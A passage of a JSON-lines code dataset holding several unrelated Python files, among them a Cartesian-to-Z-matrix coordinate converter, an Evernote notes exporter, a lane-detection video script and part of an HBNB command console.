nx.DiGraph()\nast_root = py_ast.ParseToken()\ntravel_tree(G, ast_root, 1)\npos = graphviz_layout(G, prog='dot')\nplt.figure(figsize=(16, 9))\nnx.draw(G, pos, alpha=0.3, node_size=list(\n sizes.values()), arrows=True, node_shape='o')\nnx.draw_networkx_labels(\n G, dict(map(lambda x: (x[0], (x[1][0], x[1][1]-15)), pos.items())), labels)\nplt.show()\n","sub_path":"src/parser/py_ast.py","file_name":"py_ast.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"128300258","text":"# 1502. 判断能否形成等差数列 https://leetcode.com/problems/can-make-arithmetic-progression-from-sequence/\n\n# arr = list(range(0,100,2))\n# arr = [3,5,1]\n# ans = true\n\narr = [1,2,4]\n# ans = false\n\n# arr.sort() # 1. 在arr上本身进行修改 2. 不会返回任何东西\n# # 直接使用arr\n# sorted_arr = sorted(arr) # 1. 不修改arr,将排好序的作为函数返回值,返回到sorted_arr这个变量\n# # 需要使用sorted_arr\n\n# for i in sorted(arr):\n# print(i)\n\n\nans = True\n\nArr = sorted(arr)\ndiff = Arr[1] - Arr[0]\nfor i in range(len(Arr)-1):\n if (Arr[i+1]- Arr[i]) != diff:\n # print(\"不是等差数列\")\n ans = False\n break\nif ans:\n print(\"是等差数列\")\nelse:\n print(\"不是等差数列\")\n\n \n","sub_path":"course-8/1502.py","file_name":"1502.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"446082805","text":"from .CoordinateSystemConverter import CoordinateSystemConverter\nfrom .CommonCoordinateSystems import CartesianCoordinates3D, ZMatrixCoordinates\nfrom ...Numputils import vec_norms, vec_angles, pts_dihedrals, dist_deriv, angle_deriv, dihed_deriv\nimport numpy as np\n# this import gets bound at load time, so unfortunately PyCharm can't know just yet\n# what properties its class will have and will try to claim that the files don't exist\n\nclass CartesianToZMatrixConverter(CoordinateSystemConverter):\n \"\"\"\n A converter class for going from Cartesian coordinates to ZMatrix coordinates\n \"\"\"\n\n @property\n def types(self):\n return (CartesianCoordinates3D, ZMatrixCoordinates)\n\n @staticmethod\n def get_dists(points, centers):\n return vec_norms(centers-points)\n @staticmethod\n def get_angles(lefts, centers, rights):\n # need to look up again what the convention is for which atom is the central one...\n v1s = centers-lefts\n v2s = centers-rights\n return vec_angles(v1s, v2s)[0]\n @staticmethod\n def get_diheds(points, centers, seconds, thirds):\n return pts_dihedrals(points, centers, seconds, thirds)\n\n def convert_many(self, coords, ordering=None, use_rad=True, return_derivs=False, **kw):\n \"\"\"\n We'll implement this by having the ordering arg wrap around in coords?\n \"\"\"\n if ordering is None:\n ordering = range(len(coords[0]))\n base_shape = coords.shape\n new_coords = np.reshape(coords, (np.product(base_shape[:-1]),) + base_shape[-1:])\n new_coords, ops = self.convert(new_coords, ordering=ordering, use_rad=use_rad, return_derivs=return_derivs)\n single_coord_shape = (base_shape[-2]-1, new_coords.shape[-1])\n new_shape = base_shape[:-2] + single_coord_shape\n new_coords = np.reshape(new_coords, new_shape)\n if return_derivs:\n ders = ops['derivs']\n # we assume we get a list of derivatives?\n reshaped_ders = [None]*len(ders)\n for i, v in enumerate(ders):\n single_base_shape = (base_shape[-2], new_coords.shape[-1])\n ders_shape = coords.shape + single_base_shape*i + single_coord_shape\n v = v.reshape(ders_shape)\n reshaped_ders[i] = v\n ops['derivs'] = reshaped_ders\n return new_coords, ops\n\n def convert(self, coords, ordering=None, use_rad=True, return_derivs=False, **kw):\n \"\"\"The ordering should be specified like:\n\n [\n [n1],\n [n2, n1]\n [n3, n1/n2, n1/n2]\n [n4, n1/n2/n3, n1/n2/n3, n1/n2/n3]\n [n5, ...]\n ...\n ]\n\n :param coords: array of cartesian coordinates\n :type coords: np.ndarray\n :param use_rad: whether to user radians or not\n :type use_rad: bool\n :param ordering: optional ordering parameter for the z-matrix\n :type ordering: None or tuple of ints or tuple of tuple of ints\n :param kw: ignored key-word arguments\n :type kw:\n :return: z-matrix coords\n :rtype: np.ndarray\n \"\"\"\n ncoords = len(coords)\n orig_ol = ZMatrixCoordinates.canonicalize_order_list(ncoords, ordering)\n ol = orig_ol\n nol = len(ol)\n ncol = len(ol[0])\n fsteps = ncoords / nol\n steps = int(fsteps)\n\n # print(\">> c2z >> ordering:\", ol)\n\n multiconfig = nol < ncoords\n if multiconfig:\n ol = ZMatrixCoordinates.tile_order_list(ol, ncoords)\n mc_ol = ol.copy()\n\n # we define an order map that we'll index into to get the new indices for a\n # given coordinate\n om = 1+np.argsort(ol[:, 0])\n\n # need to check against the cases of like 1, 2, 3 atom molecules\n # annoying but not hard\n if return_derivs:\n derivs = [\n np.zeros(coords.shape + (nol-1, 3)),\n np.zeros(coords.shape + (nol, 3) + (nol - 1, 3))\n ]\n if not multiconfig:\n ix = ol[1:, 0]\n jx = ol[1:, 1]\n dists = self.get_dists(coords[ix], coords[jx])\n if return_derivs:\n _dists, dist_derivs, dist_derivs_2 = dist_deriv(coords, ix, jx, order=2)\n drang = np.arange(len(ix))\n derivs[0][ix, :, drang, 0] = dist_derivs[0]\n derivs[0][jx, :, drang, 0] = dist_derivs[1]\n\n for i, x1 in enumerate([ix, jx]):\n for j, x2 in enumerate([ix, jx]):\n # print(i, j, x1, x2,\n # # dist_derivs_2[i, j][0, 0],\n # drang\n # )\n derivs[1][x1, :, x2, :, drang, 0] = dist_derivs_2[i, j]\n\n if len(ol) > 2:\n ix = ol[2:, 0]\n jx = ol[2:, 1]\n kx = ol[2:, 2]\n angles = np.concatenate( (\n [0], self.get_angles(coords[ix], coords[jx], coords[kx])\n ) )\n if not use_rad:\n angles = np.rad2deg(angles)\n if return_derivs:\n _angles, angle_derivs, angle_derivs_2 = angle_deriv(coords, jx, ix, kx, order=2)\n drang = 1+np.arange(len(ix))\n # print(\">>>>\", np.max(np.abs(angle_derivs)))\n derivs[0][jx, :, drang, 1] = angle_derivs[0]\n derivs[0][ix, :, drang, 1] = angle_derivs[1]\n derivs[0][kx, :, drang, 1] = angle_derivs[2]\n\n for i, x1 in enumerate([jx, ix, kx]):\n for j, x2 in enumerate([jx, ix, kx]):\n derivs[1][x1, :, x2, :, drang, 1] = angle_derivs_2[i, j]\n else:\n angles = np.array([0.])\n if len(ol) > 3:\n ix = ol[3:, 0]\n jx = ol[3:, 1]\n kx = ol[3:, 2]\n lx = ol[3:, 3]\n if ol.shape[1] == 5:\n raise NotImplementedError(\"psi angles might be unnecessary\")\n ix = ix.copy()\n jx = jx.copy()\n kx = kx.copy()\n lx = lx.copy()\n fx = ol[3:, 4]\n swap_pos = np.where(fx == 1)\n swap_i = ix[swap_pos]\n swap_j = jx[swap_pos]\n swap_k = kx[swap_pos]\n swap_l = lx[swap_pos]\n ix[swap_pos] = swap_l\n jx[swap_pos] = swap_i\n kx[swap_pos] = swap_j\n lx[swap_pos] = swap_k\n\n diheds = np.concatenate( (\n [0, 0],\n self.get_diheds(coords[ix], coords[jx], coords[kx], coords[lx])\n ) )\n if not use_rad:\n diheds = np.rad2deg(diheds)\n if return_derivs:\n _diheds, dihed_derivs, dihed_derivs_2 = dihed_deriv(coords, ix, jx, kx, lx, order=2)\n drang = 2+np.arange(len(ix))\n derivs[0][ix, :, drang, 2] = dihed_derivs[0]\n derivs[0][jx, :, drang, 2] = dihed_derivs[1]\n derivs[0][kx, :, drang, 2] = dihed_derivs[2]\n derivs[0][lx, :, drang, 2] = dihed_derivs[3]\n\n for i, x1 in enumerate([ix, jx, kx, lx]):\n for j, x2 in enumerate([ix, jx, kx, lx]):\n derivs[1][x1, :, x2, :, drang, 2] = dihed_derivs_2[i, j]\n else:\n diheds = np.array([0, 0])\n ol = ol[1:]\n\n else: # multiconfig\n\n # we do all of this stuff with masking operations in the multiconfiguration cases\n mask = np.repeat(True, ncoords)\n mask[np.arange(0, ncoords, nol)] = False\n ix = ol[mask, 0]\n jx = ol[mask, 1]\n dists = self.get_dists(coords[ix], coords[jx])\n if return_derivs:\n _, dist_derivs, dist_derivs_2 = dist_deriv(coords, ix, jx, order=2)\n drang = np.arange(nol-1)\n nreps = int(len(ix)/(nol-1))\n drang = np.broadcast_to(drang[np.newaxis], (nreps,) + drang.shape).flatten()\n derivs[0][ix, :, drang, 0] = dist_derivs[0]\n derivs[0][jx, :, drang, 0] = dist_derivs[1]\n\n for i, x1 in enumerate([ix, jx]):\n for j, x2 in enumerate([ix, jx]):\n derivs[1][x1, :, x2 % nol, :, drang, 0] = dist_derivs_2[i, j]\n\n if nol>2:\n # set up the mask to drop all of the first bits\n mask[np.arange(1, ncoords, nol)] = False\n ix = ol[mask, 0]\n jx = ol[mask, 1]\n kx = ol[mask, 2]\n angles = self.get_angles(coords[ix], coords[jx], coords[kx])\n angles = np.append(angles, np.zeros(steps))\n insert_pos = np.arange(0, ncoords-1*steps-1, nol-2)\n angles = np.insert(angles, insert_pos, 0)\n angles = angles[:ncoords-steps]\n if not use_rad:\n angles = np.rad2deg(angles)\n if return_derivs:\n # we might need to mess with the masks akin to the insert call...\n _, angle_derivs, angle_derivs_2 = angle_deriv(coords, jx, ix, kx, order=2)\n drang = 1+np.arange(nol-2)\n nreps = int(len(ix)/(nol-2))\n drang = np.broadcast_to(drang[np.newaxis], (nreps,) + drang.shape).flatten()\n derivs[0][jx, :, drang, 1] = angle_derivs[0]\n derivs[0][ix, :, drang, 1] = angle_derivs[1]\n derivs[0][kx, :, drang, 1] = angle_derivs[2]\n\n for i, x1 in enumerate([ix, jx, kx]):\n for j, x2 in enumerate([ix, jx, kx]):\n derivs[1][x1, :, x2 % nol, :, drang, 0] = angle_derivs_2[i, j]\n else:\n angles = np.zeros(ncoords-steps)\n\n if nol > 3:\n # set up mask to drop all of the second atom bits (wtf it means 'second')\n mask[np.arange(2, ncoords, nol)] = False\n ix = ol[mask, 0]\n jx = ol[mask, 1]\n kx = ol[mask, 2]\n lx = ol[mask, 3]\n if ol.shape[1] == 5:\n raise ValueError(\"Unclear if there is a difference between tau and psi\")\n ix = ix.copy()\n jx = jx.copy()\n kx = kx.copy()\n lx = lx.copy()\n fx = ol[mask, 4]\n swap_pos = np.where(fx == 1)\n swap_i = ix[swap_pos]\n swap_j = jx[swap_pos]\n swap_k = kx[swap_pos]\n swap_l = lx[swap_pos]\n ix[swap_pos] = swap_l\n jx[swap_pos] = swap_i\n kx[swap_pos] = swap_j\n lx[swap_pos] = swap_k\n # print(ol)\n\n diheds = self.get_diheds(coords[ix], coords[jx], coords[kx], coords[lx])\n # pad diheds to be the size of ncoords\n diheds = np.append(diheds, np.zeros(2*steps))\n\n # insert zeros where undefined\n diheds = np.insert(diheds, np.repeat(np.arange(0, ncoords-2*steps-1, nol-3), 2), 0)\n # take only as many as actually used\n diheds = diheds[:ncoords-steps]\n if not use_rad:\n diheds = np.rad2deg(diheds)\n if return_derivs:\n # Negative sign because my dihed_deriv code is for slightly different\n # ordering than expected\n _, dihed_derivs, dihed_derivs_2 = dihed_deriv(coords, ix, jx, kx, lx, order=2)\n drang = 2+np.arange(nol-3)\n nreps = int(len(ix)/(nol-3))\n drang = np.broadcast_to(drang[np.newaxis], (nreps,) + drang.shape).flatten()\n derivs[0][ix, :, drang, 2] = dihed_derivs[0]\n derivs[0][jx, :, drang, 2] = dihed_derivs[1]\n derivs[0][kx, :, drang, 2] = dihed_derivs[2]\n derivs[0][lx, :, drang, 2] = dihed_derivs[3]\n\n for i, x1 in enumerate([ix, jx, kx, lx]):\n for j, x2 in enumerate([ix, jx, kx, lx]):\n derivs[1][x1, :, x2 % nol, :, drang, 0] = dihed_derivs_2[i, j]\n\n else:\n diheds = np.zeros(ncoords-steps)\n\n # after the np.insert calls we have the right number of final elements, but too many\n # ol and om elements and they're generally too large\n # so we need to shift them down and mask out the elements we don't want\n mask = np.repeat(True, ncoords)\n mask[np.arange(0, ncoords, nol)] = False\n ol = np.reshape(ol[mask], (steps, nol-1, ncol))-np.reshape(np.arange(steps), (steps, 1, 1))\n ol = np.reshape(ol, (ncoords-steps, ncol))\n om = np.reshape(om[mask], (steps, nol-1))-nol*np.reshape(np.arange(steps), (steps, 1))-1\n om = np.reshape(om, (ncoords-steps,))\n\n final_coords = np.array(\n [\n dists, angles, diheds\n ]\n ).T\n\n if multiconfig:\n # figure out what to use for the axes\n origins = coords[mc_ol[1::nol, 1]]\n x_axes = coords[mc_ol[1::nol, 0]] - origins # the first displacement vector\n y_axes = coords[mc_ol[2::nol, 0]] - origins # the second displacement vector (just defines the x-y plane, not the real y-axis)\n axes = np.array([x_axes, y_axes]).transpose((1, 0, 2))\n else:\n origins = coords[ol[0, 1]]\n axes = np.array([coords[ol[0, 0]] - origins, coords[ol[1, 0]] - origins])\n\n ol = orig_ol\n om = om - 1\n if ncol == 5:\n ordering = np.array([\n np.argsort(ol[:, 0]), om[ol[:, 1]], om[ol[:, 2]], om[ol[:, 3]], ol[:, 4]\n ]).T\n else:\n ordering = np.array([\n np.argsort(ol[:, 0]), om[ol[:, 1]], om[ol[:, 2]], om[ol[:, 3]]\n ]).T\n opts = dict(use_rad=use_rad, ordering=ordering, origins=origins, axes=axes)\n\n # if we're returning derivs, we also need to make sure that they're ordered the same way the other data is...\n if return_derivs:\n opts['derivs'] = derivs#[:1]\n\n return final_coords, opts\n\n__converters__ = [ CartesianToZMatrixConverter() ]","sub_path":"McUtils/Coordinerds/CoordinateSystems/CartesianToZMatrix.py","file_name":"CartesianToZMatrix.py","file_ext":"py","file_size_in_byte":14789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"652157015","text":"import re\nimport subprocess\n\nfrom core.dragon import DragonInjector\nfrom data.resources import get_platform_str\n\n\ndef _filter_information(info):\n ret_value = []\n\n for item in info:\n if re.search(\"DRAGONBOOT\", item):\n try:\n injector = DragonInjector(item.split())\n ret_value.append(injector)\n except IOError:\n pass\n\n return ret_value\n\n\ndef find_dragons():\n process = None\n data = None\n command = None\n filtered_dragons = None\n\n command = get_platform_str(\"command\")\n\n try:\n process = subprocess.run(command, capture_output=True)\n data = process.stdout.decode(\"utf-8\")\n\n # this only affects Windows\n data.replace(\"\\r\\n\", \"\\n\")\n split_data = data.split(\"\\n\")\n\n filtered_dragons = _filter_information(split_data)\n except TimeoutError:\n if process:\n process.kill()\n\n return filtered_dragons\n","sub_path":"source/core/usb.py","file_name":"usb.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"388254402","text":"# Imports\nimport cv2\nfrom pipeline import Pipeline\nfrom Line import Line\n\n# Instantiate utils (calibrates camera)\npipeline = Pipeline()\nright_line = Line(10)\nleft_line = Line(10)\nlines = [left_line, right_line]\ncounter = 0\nmax_lost_frames = 2\nlost_frame = 0\n\n# read video in\nvideo = cv2.VideoCapture('../project_video.mp4')\n# to output video\nfourcc = cv2.VideoWriter_fourcc(*'MP4V')\nout = cv2.VideoWriter('../output_project_video.mp4', fourcc, 20.0, (1280, 720))\n\n# while the video is open, process images\nwhile video.isOpened():\n # read each frame\n success, image = video.read()\n\n # run the pipeline on the frame\n left_line, right_line, result = pipeline.run(image, left_line, right_line)\n\n # see if the line was detected\n if left_line.detected == False | right_line.detected == False:\n # if not add to lost (unusable) frame count\n lost_frame += 1\n else:\n # reset the count, good frame\n lost_frame = 0\n\n # print line information, offset, and lost frame count\n print('lost_frame:', lost_frame,\n 'offset:', left_line.line_base_pos,\n 'left radius:', left_line.radius_of_curvature,\n 'right radius:', right_line.radius_of_curvature\n )\n\n # if lost_frame is under the threshold, just pretend like we don't notice it\n if lost_frame < max_lost_frames:\n left_line.detected = True\n right_line.detected = True\n else:\n left_line.detected = False\n right_line.detected = False\n\n # Write the output\n out.write(result)\n # show the frames with the lane marked\n cv2.imshow('frame', result)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\nvideo.release()\nout.release()\ncv2.destroyAllWindows()\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"424798030","text":"import os\nimport shutil\nimport csv\nimport math\nimport time\nimport json\nimport copy\nimport mimetypes\n\nfrom optparse import OptionParser\n\nfrom evernote2.api.client import EvernoteClient\nfrom evernote2.edam.notestore.ttypes import NoteFilter, NotesMetadataResultSpec\nfrom evernote2.edam.type.ttypes import NoteSortOrder\nfrom evernote2.edam.error.ttypes import EDAMSystemException, EDAMErrorCode\n\nimport logging\n\n\nenex_file_basename = 'index.enex'\nmeta_file_basename = 'metadata.json'\n\n\ndef main():\n parser = OptionParser()\n\n parser.add_option('-t', '--token', dest='token', help='evernote_api_token')\n parser.add_option('-o', '--output_dir', dest='output_dir', help='dir to save notes', default='./notes-exported')\n parser.add_option('-s', '--sandbox', dest='is_sandbox', help='use sandbox', action='store_true', default=False)\n parser.add_option('-c', '--china', dest='is_china', help='use yinxiang.com instead of evernote.com', action='store_true', default=False)\n parser.add_option('-f', '--force-delete', dest='is_force_delete', help='delete output_dir if exists', action='store_true', default=False)\n parser.add_option('-m', '--max-notes-count', dest='max_notes_count', help='max notes count to download', default='10000')\n parser.add_option('-v', '--verbose', dest='verbose', help='show verbose logs', action='store_true', default=False)\n\n (options, args) = parser.parse_args()\n\n token = options.token\n output_dir = options.output_dir\n is_sandbox = options.is_sandbox\n is_china = options.is_china\n is_force_delete = options.is_force_delete\n max_notes_count = int(options.max_notes_count)\n verbose = options.verbose\n\n if verbose:\n log_level = logging.DEBUG\n else:\n log_level = logging.INFO\n\n logging.basicConfig(level=log_level, format=\"%(asctime)s | %(levelname)s | %(message)s\")\n\n if token is None:\n logging.error('error! token is None')\n parser.print_help()\n exit(1)\n\n logging.info('sandbox: %s, china: %s, output_dir: %s' % (\n is_sandbox, is_china, output_dir\n ))\n\n init_output_dir(output_dir, is_force_delete)\n download_notes(token=token, sandbox=is_sandbox, china=is_china, output_dir=output_dir, max_notes_count=max_notes_count)\n\n\ndef init_output_dir(output_dir, is_force_delete):\n # do not raise exception if output_dir exists\n # if os.path.exists(output_dir):\n # if not is_force_delete and len(os.listdir(output_dir)) > 0:\n # raise Exception('%s exists and not exmpty' % output_dir)\n\n if is_force_delete and os.path.exists(output_dir):\n logging.warning('drop dir: %s' % output_dir)\n shutil.rmtree(output_dir)\n\n if not os.path.exists(output_dir):\n os.makedirs(output_dir)\n\n\ndef download_notes(token, sandbox, china, output_dir, max_notes_count):\n client = EvernoteClient(token=token, sandbox=sandbox, china=china)\n note_store = client.get_note_store()\n\n note_books = note_store.listNotebooks()\n save_notebooks(note_books, output_dir)\n\n note_books_map = {n.guid: n.name for n in note_books}\n\n note_metas = download_metadata(note_store, max_notes_count, note_books_map)\n save_notemetas(note_metas, output_dir)\n\n enex_root = os.path.join(\n output_dir, 'note-enex',\n )\n if not os.path.exists(enex_root):\n os.makedirs(enex_root)\n\n download_all_note_enex(note_store, enex_root, note_metas)\n # total_cnt_notebooks = len(note_books)\n # for nb_idx, notebook in enumerate(note_books):\n # nb_seq = nb_idx + 1\n\n # logging.info('download notebook: (%s/%s) %s' % (nb_seq, total_cnt_notebooks, notebook.name))\n\n\ndef save_notebooks(note_books, output_dir):\n fn = os.path.join(output_dir, 'note_book_meta.csv')\n\n header = [\n 'guid',\n 'name',\n 'stack',\n 'contact',\n ]\n\n with open(fn, 'w') as csvfile:\n csvwriter = csv.writer(csvfile)\n\n csvwriter.writerow(header)\n for notebook in note_books:\n record = [getattr(notebook, i) for i in header]\n csvwriter.writerow(record)\n\n logging.info('%s notebook meta saved in %s' % (len(note_books), fn))\n\n\ndef download_metadata(note_store, max_count, note_books_map):\n batch_cnt = 100\n max_count = max_count or 10000 # ensure valuable default\n\n loops = math.ceil(max_count / batch_cnt)\n metas = []\n\n for i in range(loops):\n offset = i * batch_cnt\n result_list = download_metadata_batch(note_store, offset, batch_cnt)\n\n for idx, note in enumerate(result_list.notes):\n note_meta = {\n # 'idx': offset + idx + 1,\n 'guid': note.guid,\n 'title': note.title,\n 'contentLength': note.contentLength,\n 'created': note.created,\n 'updated': note.updated,\n 'updateSequenceNum': note.updateSequenceNum,\n 'tagGuids': note.tagGuids,\n 'notebookGuid': note.notebookGuid,\n 'notebookName': note_books_map[note.notebookGuid],\n 'attrAuthor': note.attributes.author,\n 'attrSource': note.attributes.source,\n 'attrSourceURL': note.attributes.sourceURL,\n 'attrSourceApplication': note.attributes.sourceApplication,\n 'attrShareDate': note.attributes.shareDate,\n # 'attributes': note.attributes,\n # 'largestResourceMime': note.largestResourceMime,\n # 'largestResourceSize': note.largestResourceSize,\n }\n metas.append(note_meta)\n\n if len(result_list.notes) < 100:\n break\n\n return metas[:max_count]\n\n\ndef download_metadata_batch(note_store, offset=0, batch_cnt=100):\n # note is an instance of NoteMetadata\n # result_list is an instance of NotesMetadataList\n\n updated_filter = NoteFilter(order=NoteSortOrder.UPDATED)\n result_spec = NotesMetadataResultSpec(\n includeTitle=True,\n includeContentLength=True,\n includeCreated=True,\n includeUpdated=True,\n includeUpdateSequenceNum=True,\n includeNotebookGuid=True,\n includeTagGuids=True,\n includeAttributes=True,\n # includeLargestResourceMime=True,\n # includeLargestResourceSize=True,\n )\n\n result_list = note_store.findNotesMetadata(updated_filter, offset, batch_cnt, result_spec)\n\n return result_list\n\n\ndef save_notemetas(note_metas, output_dir):\n fn = os.path.join(output_dir, 'note_meta.csv')\n\n fieldnames = [\n 'guid',\n 'title',\n 'contentLength',\n 'created',\n 'updated',\n 'updateSequenceNum',\n 'tagGuids',\n 'notebookGuid',\n 'notebookName',\n 'attrAuthor',\n 'attrSource',\n 'attrSourceURL',\n 'attrSourceApplication',\n 'attrShareDate',\n ]\n\n with open(fn, 'w') as csvfile:\n csvwriter = csv.DictWriter(csvfile, fieldnames=fieldnames)\n csvwriter.writeheader()\n for record in note_metas:\n csvwriter.writerow(record)\n\n logging.info('%s note metas saved in %s' % (len(note_metas), fn))\n\n\ndef download_all_note_enex(note_store, enex_root, note_metas):\n total_cnt = len(note_metas)\n\n new_cnt = 0\n\n for idx, meta in enumerate(note_metas):\n title = meta['title']\n guid = meta['guid']\n note_dir = os.path.join(\n enex_root, 'note-%s' % guid)\n\n text_file = os.path.join(note_dir, enex_file_basename)\n\n if os.path.exists(text_file):\n logging.debug('(%s/%s) skip download since exists: %s, %s' % (\n idx + 1, total_cnt, text_file, title))\n continue\n\n # download if not exists\n downloaded = False\n while not downloaded:\n try:\n download_one_note_enex(note_store, note_dir, guid, note_meta=meta)\n except EDAMSystemException as e:\n if e.errorCode == EDAMErrorCode.RATE_LIMIT_REACHED:\n duration = e.rateLimitDuration\n logging.info('Rate limit reacheded, sleep %s seconds and retry' % duration)\n time.sleep(duration)\n else:\n downloaded = True\n logging.info('(%s/%s) saved: %s, %s' % (idx + 1, total_cnt, note_dir, title))\n\n new_cnt += 1\n\n logging.info('%s new notes downloaded' % new_cnt)\n\n\ndef download_one_note_enex(note_store, note_dir, note_guid, note_meta):\n \"\"\"\n\n notes:\n\n save `enex_file_basename` at the end of all,\n so that we can check this file to know if the cache is good when resume running\n \"\"\"\n note = note_store.getNote(\n note_guid,\n True, # withContent=True,\n True, # withResourcesData=True,\n False, # withResourcesRecognition=False,\n False, # withResourcesAlternateData=False,\n )\n\n content = note.content # string\n contentHash = note.contentHash # string\n contentHashHex = bytes.hex(contentHash)\n contentLength = note.contentLength # i32\n # notebookGuid = note.notebookGuid\n # tagGuids = note.tagGuids # list\n tagNames = note.tagNames # List\n resources = note.resources # list\n\n # build metadata structure\n metadata = copy.deepcopy(note_meta)\n metadata['contentHashHex'] = contentHashHex\n metadata['contentLength'] = contentLength\n # metadata['notebookGuid'] = notebookGuid\n # metadata['tagGuids'] = tagGuids\n metadata['tagNames'] = tagNames\n # metadata['resourcesCount'] = len(resources)\n\n # save resources\n note_resource_dir = os.path.join(note_dir, 'resources')\n if not os.path.exists(note_resource_dir):\n os.makedirs(note_resource_dir)\n\n resource_metas = []\n\n for r in resources or []:\n r_meta = save_resources(r, note_resource_dir)\n resource_metas.append(r_meta)\n\n metadata['resourceMetas'] = resource_metas\n\n # print(metadata)\n # save metadata\n meta_filename = os.path.join(note_dir, meta_file_basename)\n with open(meta_filename, 'w') as fw:\n json.dump(metadata, fw, indent=4, ensure_ascii=False)\n\n # save enex file\n text_file = os.path.join(note_dir, enex_file_basename)\n with open(text_file, 'w') as f_enex:\n f_enex.write(content)\n\n\ndef save_resources(resource, note_resource_dir):\n\n body = resource.data.body\n bodyHash = resource.data.bodyHash # bytes\n bodyHashHex = bytes.hex(bodyHash)\n bodySize = resource.data.size\n\n width = resource.width\n height = resource.height\n duration = resource.duration\n\n updateSequenceNum = resource.updateSequenceNum\n\n mime = resource.mime\n sourceURL = resource.attributes.sourceURL\n originalName = resource.attributes.fileName\n isAttachment = resource.attributes.attachment\n\n res_meta = {\n 'bodyHashHex': bodyHashHex,\n 'bodySize': bodySize,\n\n 'width': width,\n 'height': height,\n 'duration': duration,\n\n 'updateSequenceNum': updateSequenceNum,\n\n 'mime': mime,\n 'sourceURL': sourceURL,\n 'originalName': originalName,\n 'isAttachment': isAttachment,\n }\n\n ext = mimetypes.guess_extension(mime) or '.binary'\n filename = os.path.join(note_resource_dir, '%s%s' % (bodyHashHex, ext))\n with open(filename, 'wb') as fw:\n fw.write(body)\n\n return res_meta\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"evernote2/tools/export_notes.py","file_name":"export_notes.py","file_ext":"py","file_size_in_byte":11398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"304747553","text":"#!/usr/bin/python3\n\n\"\"\"Defines the HBNH command line.\"\"\"\n\n\nimport cmd\nimport json\n\nfrom shlex import split\n\nfrom models.base_model import BaseModel\nfrom models.user import User\nfrom models.place import Place\nfrom models.state import State\nfrom models.city import City\nfrom models.amenity import Amenity\nfrom models.review import Review\nfrom models import storage\n\n\nclass HBNBCommand(cmd.Cmd):\n \"\"\"Hbnb command processor.\"\"\"\n\n prompt = '(hbnb) '\n file = None\n __classes = {\n \"BaseModel\",\n \"User\",\n \"Place\",\n \"State\",\n \"City\",\n \"Amenity\",\n \"Review\"\n }\n\n __commands = {\n \"show\",\n \"count\",\n \"all\",\n \"destroy\",\n \"update\"\n }\n\n def precmd(self, line):\n \"\"\" Get the line before interpretate\"\"\"\n if len(line):\n l_c = line.split()\n if len(l_c):\n l_last = line.split(\"{\")\n l_upd = line.split(\"\\\"\")\n all_instances = storage.all()\n ll_cc = l_c[0].split(\"(\")\n c_l = ll_cc[0].split(\".\")\n if len(ll_cc) == 2:\n l_arg = ll_cc[1].split(\"\\\"\")\n else:\n return line\n if len(c_l) == 2 and c_l[0] in self.__classes\\\n and c_l[1] in self.__commands:\n s_c = c_l[1] + \" \" + c_l[0]\n if ll_cc[1] == \")\":\n return s_c\n elif len(l_arg) == 3 and l_arg[2] == \")\":\n return s_c + \" \" + l_arg[1]\n elif len(l_upd) == 7 and l_upd[6] == \")\":\n return s_c + \" \" + l_arg[1] + \" \"\\\n + l_upd[3] + \" \\\"\" + l_upd[5] + \"\\\"\"\n elif len(l_last):\n try:\n dict_up = json.loads(\n str(\"{\" + l_last[1][:-1].replace(\"'\", \"\\\"\")))\n s_c = c_l[0] + \" \" + l_arg[1]\n for k, v in dict_up.items():\n self.do_update(\n s_c + \" \\\"\" + k + \"\\\" \\\"\" + str(v) + \"\\\"\")\n ans = c_l[1] + \" \" + s_c + \" \\\"\" + \\\n k + \"\\\" \\\"\" + str(v) + \"\\\"\"\n return ans\n except:\n return line\n else:\n return line\n else:\n return line\n else:\n return line\n else:\n return line\n\n def do_count(self, argv):\n \"\"\"Count how much instances have a given class\"\"\"\n l_c = argv.split()\n all_instances = storage.all()\n if l_c[0] in self.__classes:\n num = 0\n for k, ob in all_instances.items():\n if l_c[0] in k:\n num = num + 1\n print(num)\n else:\n print(\"** class doesn't exist **\")\n\n def help_count(self):\n \"\"\"Help command for count\"\"\"\n\n msg = \"Count how much instances have a given class\\n\"\n print(msg)\n\n def emptyline(self):\n \"\"\"Empty line method\"\"\"\n pass\n\n def do_quit(self, arg):\n \"\"\"Quit command to exit the program\"\"\"\n\n quit()\n return True\n\n def help_quit(self):\n \"\"\"Help command for quit\"\"\"\n print(\"Quit command to exit the program\\n\")\n\n def do_EOF(self, line):\n \"\"\"EOF command to exit the program\"\"\"\n print()\n return True\n\n def help_EOF(self):\n \"\"\"Help command for EOF\"\"\"\n print(\"EOF command to exit the program\\n\")\n\n def do_create(self, arg):\n \"\"\"Create a BaseModel and save the json in a file\"\"\"\n\n if len(arg) > 0:\n list_arg = arg.split()\n if list_arg[0] in HBNBCommand.__classes:\n print(eval(list_arg[0])().id)\n storage.save()\n else:\n print(\"** class doesn't exist **\")\n else:\n print(\"** class name missing **\")\n\n def help_create(self):\n \"\"\"Help command for create\"\"\"\n print(\"Create a BaseModel and save the json in a file\\n\")\n\n def do_show(self, arg):\n \"\"\"Prints the string representation of an instance\n based on the class name and id\"\"\"\n\n if len(arg) > 0:\n list_arg = arg.split()\n objects = storage.all()\n if len(list_arg) >= 2:\n clsId = list_arg[0] + '.' + list_arg[1]\n if list_arg[0] not in self.__classes:\n print(\"** class doesn't exist **\")\n elif clsId in objects:\n print(objects[clsId])\n else:\n print(\"** no instance found **\")\n else:\n if len(list_arg) == 1:\n objs_cls = [e.split('.')[0] for e in list(objects.keys())]\n if arg not in objs_cls:\n print(\"** class doesn't exist **\")\n else:\n print(\"** instance id missing **\")\n else:\n print(\"** class name missing **\")\n\n 